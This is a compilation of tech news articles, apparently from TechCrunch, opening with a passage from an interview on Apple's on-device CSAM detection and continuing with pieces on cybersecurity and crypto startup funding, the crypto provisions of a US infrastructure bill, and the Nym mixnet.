I think we’re raising the bar, compared to the industry standard way to do this. Any sort of server side algorithm that’s processing all users photos is putting that data at more risk of disclosure and is, by definition, less transparent in terms of what it’s doing on top of the user’s library. So, by building this into our operating system, we gain the same properties that the integrity of the operating system provides already across so many other features, the one global operating system that’s the same for all users who download it and install it, and so it in one property is much more challenging, even how it would be targeted to an individual user. On the server side that’s actually quite easy — trivial. To be able to have some of the properties and building it into the device and ensuring it’s the same for all users with the features enable give a strong privacy property. 

Secondly, you point out how use of on device technology is privacy preserving, and in this case, that’s a representation that I would make to you, again. That it’s really the alternative to where users’ libraries have to be processed on a server that is less private.

The things that we can say with this system is that it leaves privacy completely undisturbed for every other user who’s not into this illegal behavior, Apple gain no additional knowledge about any users cloud library. No user’s iCloud Library has to be processed as a result of this feature. Instead what we’re able to do is to create these cryptographic safety vouchers. They have mathematical properties that say, Apple will only be able to decrypt the contents or learn anything about the images and users specifically that collect photos that match illegal, known CSAM hashes, and that’s just not something anyone can say about a cloud processing scanning service, where every single image has to be processed in a clear decrypted form and run by routine to determine who knows what? At that point it’s very easy to determine anything you want [about a user’s images] versus our system only what is determined to be those images that match a set of known CSAM hashes that came directly from NCMEC and and other child safety organizations. 

Can this CSAM detection feature stay holistic when the device is physically compromised? Sometimes cryptography gets bypassed locally, somebody has the device in hand — are there any additional layers there?

I think it’s important to underscore how very challenging and expensive and rare this is. It’s not a practical concern for most users though it’s one we take very seriously, because the protection of data on the device is paramount for us. And so if we engage in the hypothetical where we say that there has been an attack on someone’s device: that is such a powerful attack that there are many things that that attacker could attempt to do to that user. There’s a lot of a user’s data that they could potentially get access to. And the idea that the most valuable thing that an attacker — who’s undergone such an extremely difficult action as breaching someone’s device — was that they would want to trigger a manual review of an account doesn’t make much sense. 

Because, let’s remember, even if the threshold is met, and we have some vouchers that are decrypted by Apple. The next stage is a manual review to determine if that account should be referred to NCMEC or not, and that is something that we want to only occur in cases where it’s a legitimate high value report. We’ve designed the system in that way, but if we consider the attack scenario you brought up, I think that’s not a very compelling outcome to an attacker.

Why is there a threshold of images for reporting, isn’t one piece of CSAM content too many?

We want to ensure that the reports that we make to NCMEC are high value and actionable, and one of the notions of all systems is that there’s some uncertainty built in to whether or not that image matched, And so the threshold allows us to reach that point where we expect a false reporting rate for review of one in 1 trillion accounts per year. So, working against the idea that we do not have any interest in looking through users’ photo libraries outside those that are holding collections of known CSAM the threshold allows us to have high confidence that those accounts that we review are ones that when we refer to NCMEC, law enforcement will be able to take up and effectively investigate, prosecute and convict.

#apple, #apple-inc, #apple-photos, #china, #cloud-applications, #cloud-computing, #cloud-services, #computing, #cryptography, #encryption, #european-union, #head, #icloud, #ios, #iphone, #law-enforcement, #operating-system, #operating-systems, #privacy, #private, #siri, #software, #united-states, #webmail

Siga secures $8.1M Series B to prevent cyberattacks on critical infrastructure

Siga OT Solutions, an Israeli cybersecurity startup that helps organizations secure their operations by monitoring the raw electric signals of critical industrial assets, has raised $8.1 million in Series B funding.

Siga’s SigaGuard says its technology, used by Israel’s critical water facilities and the New York Power Authority, is unique in that rather than monitoring the operational network, it uses machine learning and predictive analysis to “listen” to Level 0 signals. These are typically made up of components and sensors that receive electrical signals, rather than protocols or data packets that can be manipulated by hackers.

By monitoring Level 0, which Siga describes as the “richest and most reliable level of process data within any operational environment,” the company can detect cyberattacks on the most critical and vulnerable physical assets of national infrastructures. This, it claims, ensures operational resiliency even when hackers are successful in manipulating the logic of industrial control system (ICS) controllers.

Amir Samoiloff, co-founder and CEO of Siga, says: “Level 0 is becoming the major axis in the resilience and integrity of critical national infrastructures worldwide and securing this level will become a major element in control systems in the coming years.”

The company’s latest round of funding — led by PureTerra Ventures, with investment from Israeli venture fund SIBF, Moore Capital, and Phoenix Contact — comes amid an escalation in attacks against operational infrastructure. Israel’s water infrastructure was hit by three known cyberattacks in 2020 and these were followed by an attack on the water system of a city in Florida that saw hackers briefly increase the amount of sodium hydroxide in Oldsmar’s water treatment system. 

The $8.1 million investment lands three years after the startup secured $3.5 million in Series A funding. The company said it will use the funding to accelerate its sales and strategic collaborations internationally, with a focus on North America, Europe, Asia, and the United Arab Emirates. 

Read more:

#articles, #asia, #computer-security, #cryptography, #cyberattack, #cybercrime, #cybersecurity-startup, #cyberwarfare, #data-security, #energy, #europe, #florida, #israel, #machine-learning, #north-america, #nozomi-networks, #phoenix, #ransomware, #security, #united-arab-emirates

Crypto community slams ‘disastrous’ new amendment to Biden’s big infrastructure bill

Biden’s major bipartisan infrastructure plan struck a rare chord of cooperation between Republicans and Democrats, but changes it proposes to cryptocurrency regulation are tripping up the bill.

The administration intends to pay for $28 billion of its planned infrastructure spending by tightening tax compliance within the historically under-regulated arena of digital currency. That’s why cryptocurrency is popping up in a bill that’s mostly about rebuilding bridges and roads.

The legislation’s vocal critics argue that the bill’s effort to do so is slapdash, particularly a bit that would declare anyone “responsible for and regularly providing any service effectuating transfers of digital assets” to be a broker, subject to tax reporting requirements.

While that definition might be more straightforward in a traditional corner of finance, it could force cryptocurrency developers, companies and even anyone mining digital currencies to somehow collect and report information on users, something that by design isn’t even possible in a decentralized financial system.

Now, a new amendment to the critical spending package is threatening to make matters even worse.

Unintended consequences

In a joint letter about the bill’s text, Square, Coinbase, Ribbit Capital and other stakeholders warned of “financial surveillance” and unintended impacts for cryptocurrency miners and developers. The Electronic Frontier Foundation and Fight for the Future, two privacy-minded digital rights organizations, also slammed the bill.

Following the outcry from the cryptocurrency community, a pair of influential senators proposed an amendment to clarify the new reporting rules. Finance Committee Chairman Ron Wyden (D-OR) pushed back against the bill, proposing an amendment with fellow finance committee member Pat Toomey (R-PA) that would modify the bill’s language.

The amendment would establish that the new reporting “does not apply to individuals developing block chain technology and wallets,” removing some of the bill’s ambiguity on the issue.

“By clarifying the definition of broker, our amendment will ensure non-financial intermediaries like miners, network validators, and other service providers—many of whom don’t even have the personal-identifying information needed to file a 1099 with the IRS—are not subject to the reporting requirements specified in the bipartisan infrastructure package,” Toomey said.

Wyoming Senator Cynthia Lummis also threw her support behind the Toomey and Wyden amendment, as did Colorado Governor Jared Polis.

Picking winners and losers

The drama doesn’t stop there. With negotiations around the bill ongoing — the text could be finalized over the weekend — a pair of senators proposed a competing amendment that isn’t winning any fans in the crypto community.

That amendment, from Sen. Rob Portman (R-OH) and Mark Warner (D-VA), would exempt traditional cryptocurrency miners who participate in energy-intensive “proof of work” systems from new financial reporting requirements, while keeping those rules in place for those using a “proof of stake” system. Portman worked with the Treasury Department to author the cryptocurrency portion of the original infrastructure bill.

Rather than requiring an investment in computing hardware (and energy bills) capable of solving increasingly complex math problems, proof of stake systems rely on participants taking a financial stake in a given project, locking away some of the cryptocurrency to generate new coins.

Proof of stake is emerging as an attractive, climate-friendlier alternative that could reduce the need for heavy computing and huge amounts of energy required for proof of work mining. That makes it all the more puzzling that the latest amendment would specifically let proof of work mining off the hook.

Some popular digital currencies like Cardano are already built on proof of stake. Ethereum, the second biggest cryptocurrency, is in the process of migrating from a proof of work system to proof of stake to help scale its system and reduce fees. Bitcoin is the most notable digital currency that relies on proof of work.

The Warner-Portman amendment is being touted as a “compromise” but it’s not really halfway between the Wyden-Toomey amendment and the existing bill — it just introduces new problems that many crypto advocates view as a fresh existential threat to their work. Prominent members of the crypto community including Square founder and Bitcoin booster Jack Dorsey have thrown their support behind the Wyden-Lummis-Toomey amendment while slamming the second proposal as misguided and damaging.

Unfortunately for the crypto community — and the promise of the proof of stake model — the White House is apparently throwing its weight behind the Warner-Portman amendment, though that could change as eleventh hour negotiations continue.

#biden, #bitcoin, #blockchain, #broker, #cardano, #chairman, #coinbase, #cryptocurrencies, #cryptography, #democrats, #digital-currency, #electronic-frontier-foundation, #energy, #ethereum, #finance, #government, #internal-revenue-service, #jack-dorsey, #proof-of-stake, #proof-of-work, #republicans, #ribbit-capital, #ron-wyden, #tc, #white-house

Apple says it will begin scanning iCloud Photos for child abuse images

Later this year, Apple will roll out a technology that will allow the company to detect and report known child sexual abuse material to law enforcement in a way it says will preserve user privacy.

Apple told TechCrunch that the detection of child sexual abuse material (CSAM) is one of several new features aimed at better protecting the children who use its services from online harm, including filters to block potentially sexually explicit photos sent and received through a child’s iMessage account. Another feature will intervene when a user tries to search for CSAM-related terms through Siri and Search.

Most cloud services — Dropbox, Google, and Microsoft to name a few — already scan user files for content that might violate their terms of service or be potentially illegal, like CSAM. But Apple has long resisted scanning users’ files in the cloud by giving users the option to encrypt their data before it ever reaches Apple’s iCloud servers.

Apple said its new CSAM detection technology — NeuralHash — instead works on a user’s device, and can identify if a user uploads known child abuse imagery to iCloud without decrypting the images until a threshold is met and a sequence of checks to verify the content are cleared.

News of Apple’s effort leaked Wednesday when Matthew Green, a cryptography professor at Johns Hopkins University, revealed the existence of the new technology in a series of tweets. The news was met with some resistance from some security experts and privacy advocates, but also users who are accustomed to Apple’s approach to security and privacy that most other companies don’t have.

Apple is trying to calm fears by baking in privacy through multiple layers of encryption, fashioned in a way that requires multiple steps before it ever makes it into the hands of Apple’s final manual review.

NeuralHash will land in iOS 15 and macOS Monterey, slated to be released in the next month or two, and works by converting the photos on a user’s iPhone or Mac into a unique string of letters and numbers, known as a hash. Any time you modify an image slightly, it changes the hash and can prevent matching. Apple says NeuralHash tries to ensure that identical and visually similar images — such as cropped or edited images — result in the same hash.

Before an image is uploaded to iCloud Photos, those hashes are matched on the device against a database of known hashes of child abuse imagery, provided by child protection organizations like the National Center for Missing & Exploited Children (NCMEC) and others. NeuralHash uses a cryptographic technique called private set intersection to detect a hash match without revealing what the image is or alerting the user.

The results are uploaded to Apple but cannot be read on their own. Apple uses another cryptographic principle called threshold secret sharing that allows it only to decrypt the contents if a user crosses a threshold of known child abuse imagery in their iCloud Photos. Apple would not say what that threshold was, but said — for example — that if a secret is split into a thousand pieces and the threshold is ten images of child abuse content, the secret can be reconstructed from any of those ten images.

Read more on TechCrunch

It’s at that point Apple can decrypt the matching images, manually verify the contents, disable a user’s account and report the imagery to NCMEC, which is then passed to law enforcement. Apple says this process is more privacy mindful than scanning files in the cloud as NeuralHash only searches for known and not new child abuse imagery. Apple said that there is a one in one trillion chance of a false positive, but there is an appeals process in place in the event an account is mistakenly flagged.

Apple has published technical details on its website about how NeuralHash works, which was reviewed by cryptography experts.

But despite the wide support of efforts to combat child sexual abuse, there is still a component of surveillance that many would feel uncomfortable handing over to an algorithm, and some security experts are calling for more public discussion before Apple rolls the technology out to users.

A big question is why now and not sooner. Apple said its privacy-preserving CSAM detection did not exist until now. But companies like Apple have also faced considerable pressure from the U.S. government and its allies to weaken or backdoor the encryption used to protect their users’ data to allow law enforcement to investigate serious crime.

Tech giants have refused efforts to backdoor their systems, but have faced resistance against efforts to further shut out government access. Although data stored in iCloud is encrypted in a way that even Apple cannot access it, Reuters reported last year that Apple dropped a plan for encrypting users’ full phone backups to iCloud after the FBI complained that it would harm investigations.

The news about Apple’s new CSAM detection tool, without public discussion, also sparked concerns that the technology could be abused to flood victims with child abuse imagery that could result in their account getting flagged and shuttered, but Apple downplayed the concerns and said a manual review would review the evidence for possible misuse.

Apple said NeuralHash will roll out in the U.S. at first, but would not say if, or when, it would be rolled out internationally. Until recently, companies like Facebook were forced to switch off its child abuse detection tools across the bloc after the practice was inadvertently banned. Apple said the feature is technically optional in that you don’t have to use iCloud Photos, but will be a requirement if users do. After all, your device belongs to you but Apple’s cloud does not.

#apple, #apple-inc, #cloud-applications, #cloud-services, #computing, #cryptography, #encryption, #facebook, #federal-bureau-of-investigation, #icloud, #ios, #iphone, #johns-hopkins-university, #law-enforcement, #macos, #privacy, #security, #technology, #u-s-government, #united-states, #webmail

Checkmarx acquires open source supply chain security startup Dustico

Checkmarx, an Israeli provider of static application security testing (AST), has acquired open-source supply chain security startup Dustico for an undisclosed sum. 

Founded in 2020, Dustico provides a dynamic source-code analysis platform that employs machine learning to detect malicious attacks and backdoors in software supply chains. 

The acquisition will see Checkmarx combine its AST capabilities with Dustico’s behavioral analysis technology to give customers a consolidated view into the risk and reputation of open-source packages, and as a result, a more comprehensive approach to preventing supply chain attacks. 

The deal comes amid a sharp rise in supply chain attacks, in which threat actors slip malicious code into a trusted piece of software or hardware. Last December, it was revealed that Russian hackers had breached software firm SolarWinds to plant malicious code in its IT management tool Orion. This allowed the hackers — later identified as Russia’s Foreign Intelligence Service (SVR) — to access as many as 18,000 networks that used the Orion software.

Dustico’s technology, which is similar to that offered by Sonatype, analyses open source packages using a three-pronged approach. First, it factors in trust, providing visibility into the credibility of package providers and individual contributors in the open-source community, and then it examines the health of packages to determine their level of maintenance. Finally, Dustico’s advanced behavioral analysis engine inspects the package and looks for malicious attacks hiding within including backdoors, ransomware, multi-stage attacks, and trojans. 

This insight, coupled with vulnerability results from Checkmarx’s AST solutions, aims to give organizations and developers greater insights for managing the risks associated with open-source and the supply chains dependent on them, according to the two companies.

“We’re thrilled to welcome Dustico and its team to Checkmarx as the Israeli tech ecosystem continues to push the boundaries of cybersecurity innovation and talent,” said Emmanuel Benzaquen, CEO of Checkmarx. “Blending Dustico’s differentiated approach to open-source analysis with Checkmarx’s security testing capabilities will bring disruptive value to our customers as they manage the challenges with securing software supply chains.”

The acquisition of Dustico comes after Checkmarx was bought by private equity firm Hellman & Friedman at a valuation of $1.15 billion in March 2020. Prior to this, in 2015, the company was sold to Insight Partners with an $84 million investment. 

#backdoor, #ceo, #checkmarx, #computer-security, #computing, #cryptography, #cybercrime, #cyberwarfare, #developer, #hellman-friedman, #insight-partners, #ma, #machine-learning, #security, #software, #solarwinds, #supply-chain, #supply-chain-attack, #supply-chain-management, #united-states

Tenderly raises $15.3M to help Ethereum developers ship decentralized apps faster

Blockchain infrastructure startups are heating up as industry fervor brings more developers and users to a space that still feels extremely young despite a heavy institutional embrace of the crypto space in 2021.

The latest crypto startup to court the attention of venture capitalists is Tenderly, which builds a developer platform for Ethereum devs to monitor and test the smart contracts that power their decentralized apps. Tenderly CEO Andrej Bencic tells TechCrunch his startup has closed a $15.3 million Series A funding round led by Accel with additional participation from existing investors. The Belgrade startup already raised a $3.3 million seed round earlier this year led by Point Nine Capital.

The startup’s aim to date has been ensuring fledgling blockchain developers aren’t left finding out about contract errors when users discover issues and complain, instead allowing users to discover these bugs proactively. While the company’s Visual Debugger is already used by “tens of thousands” of Ethereum developers, Tenderly hopes to continue building out its toolset to help more developers build on Ethereum networks without dealing with the headaches and irregularities that they’ve had to.

“Tenderly, from its inception, has been a solution to one of our own problems,” Bencic tells TechCrunch. “We wanted to make it as easy as possible to observe and extract information from Ethereum and the adjacent networks.”

Bencic hopes the company’s product can help developers get their products out more quickly without compromising on usability.

To date, the majority of Tenderly’s customers have been relatively small startup efforts aiming to tap into the exciting world of blockchain-based computing with a particular focus on decentralized finance. Tenderly itself is a small company with its team of 14 based in Serbia. Bencic says this funding will help the company expand its global footprint and build out engineering and business hires in other geographies.

Climbing cryptocurrency prices have historically aligned pretty closely with developer uptake in the blockchain world so there is some concern that bitcoin and Ethereum’s downward-trending price corrections will lead to less stability in the pipeline of new developers embracing blockchain. That said, volatility is far from unusual to the crypto world and many developers have learned that riding its ebbs and flows is just part of the experience.

“We built most of Tenderly in the bear market, and one thing we saw is that even though you get these concerning prices, people that are excited about the tech are excited about the tech whether the coins are up or down,” Bencic says.

#articles, #blockchain, #blockchains, #cardano, #ceo, #cryptocurrencies, #cryptocurrency, #cryptography, #decentralization, #decentralized-finance, #ethereum, #finance, #joseph-lubin, #point-nine-capital, #smart-contract, #tc, #technology

Noetic Cyber emerges from stealth with $15M led by Energy Impact Partners

Noetic Cyber, a cloud-based continuous cyber asset management and controls platform, has launched from stealth with a Series A funding round of $15 million led by Energy Impact Partners.

The round was also backed by Noetic’s existing investors, TenEleven Ventures and GlassWing Ventures, and brings the total amount of funds raised by the startup to $20 million following a $5 million seed round. Shawn Cherian, a partner at Energy Impact Partners, will join the Noetic board, while Niloofar Razi Howe, a senior operating partner at the investment firm, will join Noetic’s advisory board.

“Noetic is a true market disruptor, offering an innovative way to fix the cyber asset visibility problem — a growing and persistent challenge in today’s threat landscape,” said Howe.

The Massachusetts-based startup claims to be taking a new approach to the cyber asset management problem. Unlike traditional solutions, Noetic is not agent-based, instead using API aggregation and correlation to draw insights from multiple security and IT management tools.

“What makes us different is that we’re putting orchestration and automation at the heart of the solution, so we’re not just showing security leaders that they have problems, but we’re helping them to fix them,” Paul Ayers, CEO and co-founder of Noetic Cyber tells TechCrunch.

Ayer was previously a top exec at PGP Corporation (acquired by Symantec for $370 million) and Vormetric (acquired by Thales for $400 million) and founded Noetic Cyber with Allen Roger and Allen Hadden, who have previously worked at cybersecurity vendors including Authentica, Raptor and Axent. All three were also integral to the development of Resilient Systems, which was acquired by IBM.

“The founding team’s experience in the security, orchestration, automation and response market gives us unique experience and insights to make automation a key pillar of the solution,” Ayers said. “Our model gives you the certainty to make automation possible, the goal is to find and fix problems continuously, getting assets back to a secure state.”

“The development of the technology has been impacted by the current cyber landscape, and the pandemic, as some of the market drivers we’ve seen around the adoption of cloud services, and the increased use of unmanaged devices by remote workers, are driving a great need for accurate cyber asset discovery and management.”

The company, which currently has 20 employees, says it plans to use the newly raised funds to double its headcount by the end of the year, as well as increase its go-to-market capability in the U.S. and the U.K. to grow its customer base and revenue growth.

“In terms of technology development, this investment allows us to continue to add development and product management talent to the team to build on our cyber asset management platform,” Ayers said. 

“The beauty of our approach is that it allows us to easily add more applications and use cases on top of our core asset visibility and management model. We will continue to add more connectors to support customer use cases and will be bringing a comprehensive controls package to market later in 2021, as well as a community edition in 2022.”

#api, #cloud-services, #computer-security, #computing, #cryptography, #cybercrime, #cyberwarfare, #data-security, #energy-impact-partners, #funding, #glasswing-ventures, #ibm, #information-technology, #malware, #massachusetts, #partner, #raptor, #resilient-systems, #security, #shawn-cherian, #symantec, #technology-development, #teneleven-ventures, #thales, #united-kingdom, #united-states, #vormetric

Magic lands $27M Series A for its ‘plug and play’ passwordless tech

Magic, a San Francisco-based startup that builds “plug and play” passwordless authentication technology, has raised $27 million in Series A funding.

The round, led by Northzone and with participation from Tiger Global, Volt Capital, Digital Currency Group and CoinFund, comes just over a year after Magic launched from stealth, rebranding from its previous name Formatic. 

The company, like many others, is on a mission to end traditional password-based authentication. Magic’s flagship SDK, which launched in April 2020, enables developers to implement a variety of passwordless authentication methods with just a few lines of code and integrates with a number of modern frameworks and infrastructures.

Not only does the SDK make it easier for companies and developers to implement passwordless auth methods in their applications, but it could also help to mitigate the expensive fallout that many have to deal with as a result of data breaches.

“This is why the password is so dangerous,” Sean Li, Magic co-founder and CEO tells TechCrunch. “It’s like a Jenga tower right now — a hacker breaching your system can download an entire database of encrypted passwords, and then easily crack them. It’s a huge central point of failure.”

The company recently built out its SDK to add support for WebAuthn, which means it can support hardware-based authentication keys like Yubico, as well as biometric-based Face ID and fingerprint logins on mobile devices. 

“It’s less mainstream right now, but we’re making it super simple for developers,” says Li. “This way we can help promote new technologies, and that’s really good for user security and privacy.” 

It’s a bet that seems to be working: Magic has recorded a 13% month-over-month increase in developer signups, and the number of identities secured is growing at a rate of 6% weekly, according to Magic. It’s also secured a number of big-name customers, from crypto news publisher Decrypt to fundraising platform Fairmint.

Wendy Xiao Schadeck, a partner at Northzone said: “We couldn’t be more excited to support Sean and the Magic team as they redefine authentication for the internet from the bottom up, solving a core pain point for developers, users, and companies. 

“It was clear to us that they’re absolutely loved by their customers because the team is so obsessed with serving every single part of the developer journey across several communities. What’s potentially even more exciting is what they will be able to do to empower users and decentralize the identity layer of the web.”

The company now plans to continue to scale its platform and expand its team to meet what Magic describes as “soaring” demand. The startup, which currently has 30 employees that work remotely on a full-time basis, expects to at least double its headcount across all core functions, including product, engineering, design, marketing, finance, people, and operations.

It’s also planning to hope to build out the SDK even further; Li says he wants to be able to plug into more kinds of technology, from low-code applications to workflow automations. 

“The vision is much bigger than that. We want to be the passport of the internet,” Li adds. 

#access-control, #coinfund, #computer-security, #cryptography, #decrypt, #developer, #digital-currency-group, #finance, #funding, #mobile-devices, #northzone, #password, #plug-and-play, #san-francisco, #security, #tiger-global, #volt-capital, #yubico, #yubikey

Nym gets $6M for its anonymous overlay mixnet to sell privacy as a service

Switzerland-based privacy startup Nym Technologies has raised $6 million, which is being loosely pegged as a Series A round.

Earlier raises included a $2.5M seed round in 2019. The founders also took in grant money from the European Union’s Horizon 2020 research fund during an earlier R&D phase developing the network tech.

The latest funding will be used to continue commercial development of network infrastructure which combines an old idea for obfuscating the metadata of data packets at the transport network layer (Mixnets) with a crypto inspired reputation and incentive mechanism to drive the required quality of service and support a resilient, decentralized infrastructure.

Nym’s pitch is it’s building “an open-ended anonymous overlay network that works to irreversibly disguise patterns in Internet traffic”.

Unsurprisingly, given its attention to crypto mechanics, investors in the Series A have strong crypto ties — and cryptocurrency-related use-cases are also where Nym expects its first users to come from — with the round led by Polychain Capital, with participation from a number of smaller European investors including Eden Block, Greenfield One, Maven11, Tioga, and 1kx.

Commenting in a statement, Will Wolf of Polychain Capital, said: “We’re incredibly excited to partner with the Nym team to further their mission of bringing robust, sustainable and permissionless privacy infrastructure to all Internet users. We believe the Nym network will provide the strongest privacy guarantees with the highest quality of service of any mixnet and thus may become a very valuable piece of core internet infrastructure.”

The Internet’s ‘original sin’ was that core infrastructure wasn’t designed with privacy in mind. Therefore the level of complicity involved in Mixnets — shuffling and delaying encrypted data packets in order to shield sender-to-recipient metadata from adversaries with a global view of a network — probably seemed like over engineering all the way back when the web’s scaffolding was being pieced together.

But then came Bitcoin and the crypto boom and — also in 2013 — the Snowden revelations which ripped the veil off the NSA’s ‘collect it all’ mantra, as Booz Allen Hamilton sub-contractor Ed risked it all to dump data on his own (and other) governments’ mass surveillance programs. Suddenly network level adversaries were front page news. And so was Internet privacy.

Since Snowden’s big reveal, there’s been a slow burn of momentum for privacy tech — with rising consumer awareness fuelling usage of services like e2e encrypted email and messaging apps. Sometimes in spurts and spikes, related to specific data breaches and scandals. Or indeed privacy-hostile policy changes by mainstream tech giants (hi Facebook!).

Legal clashes between surveillance laws and data protection rights are also causing growing b2b headaches, especially for US-based cloud services. While growth in cryptocurrencies is driving demand for secure infrastructure to support crypto trading.

In short, the opportunity for privacy tech, both b2b and consumer-facing, is growing. And the team behind Nym thinks conditions look ripe for general purpose privacy-focused networking tech to take off too.

Of course there is already a well known anonymous overlay network in existence: Tor, which does onion routing to obfuscate where traffic was sent from and where it ends up.

The node-hopping component of Nym’s network shares a feature with the Tor network. But Tor does not do packet mixing — and Nym’s contention is that a functional mixnet can provide even stronger network-level privacy.

It sets out the case on its website — arguing that “Tor’s anonymity properties can be defeated by an entity that is capable of monitoring the entire network’s ‘entry’ and ‘exit’ nodes” since it does not take the extra step of adding “timing obfuscation” or “decoy traffic” to obfuscate the patterns that could be exploited to deanonymize users.

“Although these kinds of attacks were thought to be unrealistic when Tor was invented, in the era of powerful government agencies and private companies, these kinds of attacks are a real threat,” Nym suggests, further noting another difference in that Tor’s design is “based on a centralized directory authority for routing”, whereas Nym fully decentralizes its infrastructure.

Proving that suggestion will be quite the challenge, of course. And Nym’s CEO is upfront in his admiration for Tor — saying it is the best technology for securing web browsing right now.

“Most VPNs and almost all cryptocurrency projects are not as secure or as private as Tor — Tor is the best we have right now for web browsing,” says Nym founder and CEO Harry Halpin. “We do think Tor made all the right decisions when they built the software — at the time there was no interest from venture capital in privacy, there was only interest from the US government. And the Internet was too slow to do a mixnet. And what’s happened is speed up 20 years, things have transformed.

“The US government is no longer viewed as a defender of privacy. And now — weirdly enough — all of a sudden venture capital is interested in privacy and that’s a really big change.”

With such a high level of complexity involved in what Nym’s doing it will, very evidently, need to demonstrate the robustness of its network protocol and design against attacks and vulnerabilities on an ongoing basis — such as those seeking to spot patterns or identify dummy traffic and be able to relink packets to senders and receivers.

The tech is open source but Nym confirms the plan is to use some of the Series A funding for an independent audit of new code.

It also touts the number of PhDs it’s hired to-date — and plans to hire a bunch more, saying it will be using the new round to more than double its headcount, including hiring cryptographers and developers, as well as marketing specialists in privacy.

The main motivation for the raise, per Halpin, is to spend on more R&D to explore — and (he hopes) — solve some of the more specific use-cases it’s kicking around, beyond the basic one of letting developers use the network to shield user traffic (a la Tor).

Nym’s whitepaper, for example, touts the possibility for the tech being used to enable users to prove they have the right to access a service without having to disclose their actual identity to the service provider.

Another big difference vs Tor is that Tor is a not-for-profit — whereas Nym wants to build a for-profit business around its Mixnet.

It intends to charge users for access to the network — so for the obfuscation-as-a-service of having their data packets mixed into a crowd of shuffled, encrypted and proxy node-hopped others.

But potentially also for some more bespoke services — with Nym’s team eyeing specific use-cases such as whether its network could offer itself as a ‘super VPN’ to the banking sector to shield their transactions; or provide a secure conduit for AI companies to carry out machine learning processing on sensitive data-sets (such as healthcare data) without risking exposing the information itself.

“The main reason we raised this Series A is we need to do more R&D to solve some of these use-cases,” says Halpin. “But what impressed Polychain was they said wow there’s all these people that are actually interested in privacy — that want to run these nodes, that actually want to use the software. So originally when we envisaged this startup we were imagining more b2b use-cases I guess and what I think Polychain was impressed with was there seemed to be demand from b2c; consumer demand that was much higher than expected.”

Halpin says they expect the first use-cases and early users to come from the crypto space — where privacy concerns routinely attach themselves to blockchain transactions.

The plan is to launch the software by the end of the year or early next, he adds.

“We will have at least some sort of chat applications — for example it’s very easy to use our software with Signal… so we do think something like Signal is an ideal use-case for our software — and we would like to launch with both a [crypto] wallet and a chat app,” he says. “Then over the next year or two — because we have this runway — we can work more on kind of higher speed applications. Things like try to find partnerships with browsers, with VPNs.”

At this (still fairly early) stage of the network’s development — an initial testnet was launched in 2019 — Nym’s eponymous network has amassed over 9,000 nodes. These distributed, crowdsourced providers are only earning a NYM reputation token for now, and it remains to be seen how much exchangeable crypto value they might earn in the future as suppliers of key infrastructure if/when usage takes off.

Why didn’t Mixnets as a technology take off before, though? After all the idea dates back to the 1980s. There’s a range of reasons, according to Halpin — issues with scalability being one of them one. And a key design “innovation” he points to vis-a-vis its implementation of Mixnet technology is the ability to keep adding nodes so the network is able to scale to meet demand.

Another key addition is that the Nym protocol injects dummy traffic packets into the shuffle to make it harder for adversaries to decode the path of any particular message — aiming to bolster the packet mixing process against vulnerabilities like correlation attacks.

While the Nym network’s crypto-style reputation and incentive mechanism — which works to ensure the quality of mixing (“via a novel proof of mixing scheme”, as its whitepaper puts it) — is another differentiating component Halpin flags.

“One of our core innovations is we scale by adding servers. And the question is how do we add servers? To be honest we added servers by looking at what everyone had learned about reputation and incentives from cryptocurrency systems,” he tells TechCrunch. “We copied that — those insights — and attached them to mix networks. So the combination of the two things ends up being pretty powerful.

“The technology does essentially three things… We mix packets. You want to think about an unencrypted packet like a card, an encrypted packet you flip over so you don’t know what the card says, you collect a bunch of cards and you shuffle them. That’s all that mixing is — it just randomly permutates the packets… Then you hand them to the next person, they shuffle them. You hand them to the third person, they shuffle them. And then they had the cards to whoever is at the end. And as long as different people gave you cards at the beginning you can’t distinguish those people.”

More generally, Nym also argues it’s an advantage to be developing mixnet technology that’s independent and general purpose — folding all sorts and types of traffic into a shuffled pack — suggesting it can achieve greater privacy for users’ packets in this pooled crowd vs similar tech offered by a single provider to only their own users (such as the ‘privacy relay’ network recently announced by Apple).

In the latter case, an attacker already knows that the relayed traffic is being sent by Apple users who are accessing iCloud services. Whereas — as a general purpose overlay layer — Nym can, in theory, provide contextual coverage to users as part of its privacy mix. So another key point is that the level of privacy available to Nym users scales as usage does.

Historical performance issues with bandwidth and latency are other reasons Halpin cites for Mixnets being largely left on the academic shelf. (There have been some other deployments, such as Loopix — which Nym’s whitepaper says its design builds on by extending it into a “general purpose incentivized mixnet architecture” — but it’s fair to say the technology hasn’t exactly gone mainstream.)

Nonetheless, Nym’s contention is the tech’s time is finally coming; firstly because technical challenges associated with Mixnets can be overcome — because of gains in Internet bandwidth and compute power; as well as through incorporating crypto-style incentives and other design tweaks it’s introducing (e.g. dummy traffic) — but also, and perhaps most importantly, because privacy concerns aren’t simply going to disappear.

Indeed, Halpin suggests governments in certain countries may ultimately decide their exposure to certain mainstream tech providers which are subject to state mass surveillance regimes — whether that’s the US version or China’s flavor or elsewhere —  simply isn’t tenable over the longer run and that trusting sensitive data to corporate VPNs based in countries subject to intelligence agency snooping is a fool’s game.

(And it’s interesting to note, for example, that the European Data Protection Supervisor is currently conducting a review of EU bodies use of mainstream US cloud services from AWS and Microsoft to check whether they are in compliance with last summer’s Schrems II ruling by the CJEU, which struck down the EU-US Privacy Shield deal, after again finding US surveillance law to be essentially incompatible with EU privacy rights… )

Nym is betting that some governments will — eventually — come looking for alternative technology solutions to the spying problem. Although government procurement cycles make that play a longer game.

In the near term, Halpin says they expect interest and usage for the metadata-obscuring tech to come from the crypto world where there’s a need to shield transactions from view of potential hackers.

“The websites that [crypto] people use — these exchanges — have also expressed interest,” he notes, flagging that Nym also took in some funding from Binance Labs, the VC arm of the cryptocurrency exchange, after it was chosen to go through the Lab’s incubator program in 2018.

The issue for crypto users is their networks are (relatively) small, per Halpin — which makes them vulnerable to deanonymization attacks.

“The thing with a small network is it’s easy for random people to observe this. For example people who want to hack your exchange wallet — which happens all the time. So what cryptocurrency exchanges and companies that deal with cryptocurrency are concerned about is typically they do not want the IP address of their wallet revealed for certain kinds of transactions,” he adds. “This is a real problem for cryptocurrency exchanges — and it’s not that their enemy is the NSA; their enemy could be — and almost always is — an unknown, often lone individual but highly skilled hacker. And these kinds of people can do network observations, on smaller networks like cryptocurrency networks, that are essentially are as powerful as what the NSA could do to the entire Internet.”

